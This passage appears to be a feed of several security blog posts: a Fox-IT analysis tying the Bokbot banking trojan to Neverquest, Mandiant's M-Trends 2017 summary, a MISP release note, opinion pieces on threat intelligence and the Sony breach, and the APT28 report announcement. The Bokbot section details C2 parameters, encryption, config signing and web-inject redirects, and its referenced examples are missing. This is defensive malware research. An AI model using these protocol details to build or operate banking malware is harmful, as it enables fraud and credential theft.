By leveraging these business connections, especially the connection with Dyre, Neverquest is able to maximize the monetization of the bots. This since Neverquest could see if a bot was of interest to the group and if not, it could be handed off to Dyre which could cast a wider net, targeting for example a bigger or different geographical region and utilize a bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge amounts of financial losses, ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end, as an individual named Stanislav Lisov was arrested in Spain. This individual was proven to be a key player in the operation: soon after the arrest the backend servers of Neverquest went offline, never to come back online, marking the end of a 6 year long fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At this time the malware was being distributed to US infections by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after having discovered evidence that linked Bokbot to Neverquest, which will be further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST- and GET-requests. The initial request sent to the C2 is a POST-request containing some basic information about the machine it’s running on, as seen in the example below. Any additional requests like requesting configs or modules are sent using GET-requests, except for the uploading of any stolen data such as files, HTML code, screenshots or credentials which the victim submits using POST-requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL param. Comment
b Bot identifier, contains the information needed to identify the individual bot and where it belongs. More information on this in later a section.
d Type of uploaded information. For example screenshot, grabbed form, HTML or a file
e Bot build version
i System uptime
POST-data param. Comment
k Computer name (Unicode, URL-encoded)
l Member of domain… (Unicode, URL-encoded)
j Bot requires signature verification for C2 domains and self-updates
n Bot running with privilege level…
m Windows build information (version, arch., build, etc.)

The parameters that are not included in the table above are used to report stolen data to the C2.

The C2 response of this particular bot version is a simple set of integers which tells the bot which command(s) that should be executed. This is the only C2 response that is unencrypted, all other responses are encrypted using RC4. Some responses are, like the configs, also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing “zeus” as the signature remains unknown, it could be an intentional false flag, in an attempt to trick analysts into thinking that this might be a new ZeuS strain. Similar elusive techniques have been used before to trick analysts. A simpler explanation could be that the developer simply had an ironic sense of humor, and chose the first malware name that came to mind as the 4 byte signature.


Bokbot supports three different types of configs, which all are in a binary format rather than some structured format like XML, which is, for example, used by TheTrick.

Config Comment
Bot The latest C2 domains
Injects Contains targets which are subject to web injects and redirection attacks
Reporting Contains targets related to HTML grabbing and screenshots

The first config, which includes the bot C2 domains, is signed. This to prevent that a takeover of any of the C2 domains would result in a sinkholing of the bots. The updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config is used for a more generic purpose, where it’s not only used for screenshots but also for HTML grabbing, which would grab a complete HTML page if a victim browses to an “interesting” website, or if the page contains a specific keyword. This enables the actors to conduct some reconnaissance for future attacks, like being able to write web injects for a previously unknown target.

Geographical foothold

Ever since the appearance Bokbot has been heavily focused on targeting financial institutions in the US even though they’re still gathering any data that they deem interesting such as credentials for online services.

Based on Fox-IT’s observation of the malware spread and the accompanied configs we find that North America seems to be Bokbot’s primary hunting ground while high infection counts have been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

The two bots, on a binary level, do not show much similarity other than the fact that they’re both communicating over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn’t be much of an attribution as it’s also a combination used in for example ZeuS Gameover, Citadel and Corebot v1.

The below tables provides a short summary of the similarities between the groups.

Connection Comment
Bot and project ID format The usage of projects and the bot ID generation are unique to these groups along with the format that this information is communicated to the C2.
Inject config The injects and redirection entries are very similar and the format haven’t been seen in any other malware family.
Reporting config The targeted URLs and “interesting” keywords are almost identical between the two.
Affiliations The two group share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string is of course different between the families, where Neverquest (in the latest version) placed it, encoded, in the Cookie header field. Older version of Neverquest sent this information in the URL. Bokbot on the other hand sends it in the URL as shown in a previous section.

One important difference is that Neverquest used a simple number for their project ID, 7, in the example above. Bokbot on the other hand is using a different, unknown format for its project ID. A theory is that this could be the CRC checksum of the project name to prevent any leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8 bit checksum that is calculated using the project ID and the bot ID. This checksum is then validated on the server side and if it doesn’t match, no commands will be returned.

To this date there has been a total of 20 projects over 25 build versions observed, numbers that keeps on growing.

Inject config – Dynamic redirect structure

The inject config not only contain web injects but also redirects. Bokbot supports both static redirects which redirects a static URL but also dynamic redirects which redirects a request based on a target matched using a regular expression.

The above example is a redirect attack from a Neverquest config. They use a regular expression to match on the requested URL. If it should match they will extract the name of the requested file along with its extension. The two strings are then used to construct a redirect URL controlled by the actors. Thereby, the $1 will be replaced with the file name and $2 will be replaced with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence but it should be mentioned that this is something that has only been observed in Neverquest and Bokbot.

Reporting config

This config was one of the very first things that hinted about a connection between the two groups. By comparing the configs it becomes quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

None of these groups are short on connections in the cybercrime underworld. It’s already mentioned that Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. But it’s also important to take into account that Dyre didn’t completely go away after the group got dismantled but was rather replaced with TheTrick which gives a further hint of a connection.

Neverquest affil. Bokbot affil. Comment
Dyre TheTrick Neverquest downloads & executes Dyre
Bokbot downloads & executes TheTrick
TinyLoader TinyLoader Neverquest downloads & executes TinyLoader which downloads AbaddosPOS
Bokbot downloads & executes TinyLoader, additional payload remains unknown at this time
Chanitor Chanitor Neverquest utilizes Chanitor for distribution of Neverquest
Bokbot utilizes Chanitor for distribution of Bokbot, downloads SendSafe spam malware to older infections.
Geodo Bokbot utilizes Geodo for distributing Bokbot
Gozi-ISFB Bokbot utilizes Gozi-ISFB for distributing Bokbot

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, an existing Bokbot infection that was running an older version than the one being distributed by Chanitor, would receive a download & execute command which pointed to the SendSafe spambot, used by the Chanitor group to send spam. Suggesting that they may have exchanged “infections for infections”.

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The below graph show all the observed affiliations to date.


Events over time

All of the above information have been collected over time during the development and tracking of Bokbot. The events and observations can be observed on the below timeline.


The first occurrence of TheTrick being downloaded was in July 2017 but Bokbot has since been downloading TheTrick at different occasions.

At the end of December 2017 there was little Bokbot activity, likely due to the fact that it was holidays. It’s not uncommon for cybercriminals to decrease their activity during the turn of the year, supposedly everyone needs holidays, even cybercriminals. They did however push an inject config to some bots which targeted *.com with the goal of injecting Javascript to mine Monero cryptocurrency. As soon as an infected user visits a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors.  This was likely an attempt to passively monetize the bots while the actors was on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on Internet and incorporate them automatically in MISP. The feed imported can create new event or update an existing event. The freetext feed feature permits to preview the import and quickly integrates external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike when a properly useful term is commandeered by the army of marketing people out there in the market space and promptly loses any real meaning. It makes me crazy, as it should make you, when terms devised to speak to some new method, utility, or technology becomes virtually meaningless when everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.

So when I see things like this post, "7 Security buzzwords that need to be put to rest" on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bath-water.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.

Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, this is consumed much like you would an RSS feed of news -- except that the intent is typically for automated consumption by tools and technologies that requires very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and an complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization who is understaffed, and relies heavily on network-based security devices to protect their assets. Incorporating a known-bad (IP reputation) feed into their currently deployed network security technologies may be more than a simple added layer of security. This may in fact be an evolution, but one that only a lower-level security organization can appreciate.

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.

Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree, the marketing organizations in the big vendors (and small, to be fair) have all but ruined the reputation of the phrase threat intelligence I dare you to run a successful security program without understanding your threats and adversaries, and be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.

So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw away the baby in the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats because we're sick of hearing talking heads mis-use and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once you have these characteristics for your threat intelligence "feed" then you have significantly more than just an RSS feed. You have something that can act as a catalyst for your security program stuck in the 90's. Let's not let our pull to be snarky get the best of us, and throw away a perfectly legitimate term. Instead, let's take those who mis-use and abuse the term and point them out and call them out for their disservice to our mission.

The Absolute Worst Case – 2 Examples of Security’s Black Swans

You know that saying "It just got real"? If you're an employee of Sony Pictures - it just got real. In a very, very bad way. There are reports that the entire Sony Pictures infrastructure is down, computer, network, VPN and all - and that there isn't an ETR on target.

There are reports that there is highly sensitive information being held for "ransom", if you can call it that, by that attackers. There is even some reporting that someone representing the attackers has contacted the tech media and disclosed that the way they were able to infiltrate so completely was through insider help. In other words, the barbarians were literally inside the castle walls.

If you work in enterprise security I don't need to explain to you how bad this is, or how thoroughly this type of compromise breaks every single contingency plan most companies (outside the government, defense space) have in place. This compromise, an "IT matter" as Sony Pictures' PR calls it, is epic levels of bad.

Definition of Black Swan event, for clarity:
"The black swan theory or theory of black swan events is a metaphor that describes an event that comes as a surprise, has a major effect, and is often inappropriately rationalized after the fact with the benefit of hindsight."
--Source: Wikipedia--

You can read some fantastic reporting on the issue here:

Although I truly do not envy those poor souls in Enterprise Security over at Sony Pictures, it's the broader implications of this kind of attack that seriously concern me. This isn't the first time we've seen this type of attack - where the attackers had complete and total access (allegedly) into the infrastructure of the enterprise. It won't be the last time. So can we learn something here, and take it with us going forward? I think we can, if we're willing to pay attention.

I'd like to pose a few hypothetical scenarios here, given the lesson we're learning again from this unfortunate case- and what can or should be done to avoid being, to put it mildly, thoroughly screwed.

Case- Insider Threat / Rogue Insider
Insider threats are the stuff of myth in much of enterprise security. We hear a lot about how dangerous they can be but it's rare that someone actually comes forward with a first-hand account. If this incident is truly an insider threat (rogue employee, aiding an outside attacker) then it will be a case used for years to illustrate the point.

Insiders hold a special place in the nightmares of enterprise security professionals. Mostly because much of our defenses are positioned at our borders so when someone who has access and is a trusted insider goes rogue we have very little recourse. This is the continuing problem we see as defenders - the M&Ms paradigm. Hard outer shell, soft chewy middle.

A lifetime ago when I was leading up enterprise security engineering our team had discussions about how we were going to protect ourselves against this type of threat. We knew we had malicious insiders in many places with deep access and deeper pockets - so rooting them out wasn't going to work. If you can't keep them out then what's the next line of prevention? Maybe it's a little bit of 1990's technology like segmentation of network assets, separation of duties, and tight identity and access management controls. Further that, we profile people's behaviors and look to build operational baselines - I know this is much easier said than done, no need to repeat.

So what happens when prevention fails, often catastrophically and publicly? We turn to detection and response. Failure to prevent isn't failure, it's a fail in the kill chain, forcing us to move to the next step down. Detection, swiftly and silently, is the next big key. Again, if you don't know what normal looks like you will never know what abnormal deviation is, I hope that's intuitive. I've never known an attacker that gets caught by an IPS signature - mainly because there is no such thing. So again, what does detection look like? I think it comes down to detecting deviations (even if they're subtle) in behavioral patterns of humans and/or systems. I don't think you need to spend a million dollars to do it. Maybe it's enough to use Marcus Ranum's "never-seen-before" idea. Take key assets, and build access tables for who accesses, how frequently, and when. Then look for net-new access (even if it's legal/allowed) and investigate. Sure, you may technically have access to that HR share, but you really shouldn't be accessing it, and under normal conditions you wouldn't.

But what if the things you're stealing as an insider threat are the things you work with and have access to every day. Well, then we focus on exfiltration (deeper down the kill chain). How does it leave your environment? Can you prevent people from taking data out of your network, or at least catch them when they try? I'm fairly confident the answer is no if it's just a general question - but if you can identify and tag at some meta-level things that are critical, really critical, to your organization maybe you can find when it's trying to leave the infrastructure without permission? I don't know the answer here mainly because one answer isn't going to solve all of the problems out there, and it's a "well, it depends" answer based on your company profile.

I can tell you this though, insider threats are models for using kill chain analysis.

Recovering from an insider is a little more difficult, particularly when you don't know who they are. Insiders can burrow deep, and stay hidden for a long time - sometimes going completely undiscovered. This means that if you're fairly sure you've been compromised by a malicious insider, but can't identify the attacker, you're in for a rough go at trying to figure out what state to restore to. Do you restore your network/infrastructure to 2 days ago? 2 weeks ago? 2 months ago? The answer is uncertain until you find and profile the attacker. Once you do, you're likely to discover that you can't trust much of your infrastructure telemetry if the attacker was well-hidden. Covering their tracks is something "advanced" adversaries are good at.

The things to think about here are two-fold. First - you need to identify and attribute the attack to someone, or a group. Post-haste. Yesterday speeds. You need to know who they are, so you can start tracing their steps and figure out what they did, when they did it, and the extent of the potential damage. If you can't figure this out quickly, getting the infrastructure to a working state may not do you any good because it could still be compromised in that state, or could leave you open to another run at compromised further down the line when you believe you've removed the threat.

Second, you need to restore services and bring back the business. Today many companies simply cease to exist without IT. If you want to degrade or destroy a company - take away their ability to network and communicate. The battle of service restoration versus security analysis will be bitter, and  you'll probably lose as the CISO. Restore services, and figure out what's going on, maybe in parallel, maybe not - but that first step is almost universal with the notable exception of a few industry segments where being secured is as critical as being online.

Case- Compromised Core Infrastructure
Nothing says you're about to have a bad day like the source of a major attack on your enterprise coming through your endpoint management infrastructure. This starts to feel a lot like an insider threat - although it doesn't necessarily have to be. I can't even imagine the horror of finding out that your endpoint patching and software delivery platform has been re-purposed to deliver malware to all of your endpoints and that it has been the focal point of your adversary's operations. If you can't trust your core infrastructure - what can you trust?

Perhaps trust is the wrong way to look at it, as my friend Steve Ragan pointed out. So what then?

Within the enterprise framework there has to be some piece of infrastructure that is trusted. Maybe it's a system that stays physically offline (off?) until it's critically needed with alternate credentials and operational parameters. Maybe it's a recovery platform that you have a known-good hash of so that you can quickly validate you're working with the genuine article. Maybe it's something else, but you have to have something to trust.

If you have a compromised core infrastructure, I think you're looking at one of two options. Option A is restoring your systems to a questionable state (but not obviously compromised and usable) and working backwards to find the intruder. Option B is closing everything down and re-deploying everything and starting from scratch. Option B may very well sound like the more security-sound option until you factor in the actual data. Nothing says your data can't be's not just about windows credentials. Maybe some of your company's top-secret documents are PDFs. Maybe the attacker was clever and trojaned all of your PDFs such that as soon as one is opened, the compromise starts all over again.

I seriously doubt that would be detected because it's likely custom-written code and won't pop up on all but the most sophisticated (dare I say "next ten") detection tools.

My suggestion here? Start with the inner-most critical components of your infrastructure, audit and reset credentials and work your way out in concentric rings until you start to get to components which you can actually get by without. This exercise should keep your operations teams busy for a while, and you can maybe even get a parallel incident response investigation going in the mean time. On the plus side, this gives you a tiny window within which to start to build things better from the ashes. Or maybe not since you'll be going at light speed plus 1mph. This is, however, the only advice that makes sense. It's also the only advice I can give you that I have actually tried myself - and as painful as it sounds, believe me when I say that in real life it's significantly worse.

Before this post gets to long (or have we long crossed that bridge?) I think it's safe to say that very few of you reading this post are operationally prepared to handle this type of incident where you've either got a malicious insider who has gone undetected and wreaked utter chaos, or a compromised core infrastructure by an outsider - or both if you're won the crap lottery. That's a problem because this is our black swan. This is our version of planes with hijackers flying into buildings. We know it's a possibility, but none of us have the resources to do prepare, and let's face it - we have bigger problems. Except that these incidents are real. And the Black Swan is real. It happens. Now what?

Does this adjust your world view, or risk model for your organization somehow? If so, in what way? Will you start taking the insider threat more seriously as a result? Why or why not... and how? By my unscientific calculation there are probably .05% of companies out there who have the capital and the resources to pull off recovering from one of these Black Swan events, with anything even resembling success. The rest of us in the enterprise? What do we do when the worst-case happens?

I'm curious on how you see things. Leave a comment here, or take the conversation to Twitter with the hashtag #DtSR - let's talk about it. I think we can learn something from the horrendous situation Sony Pictures is living right now - let's not waste a teachable moment for everyone, collectively, to get even a tiny bit better.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.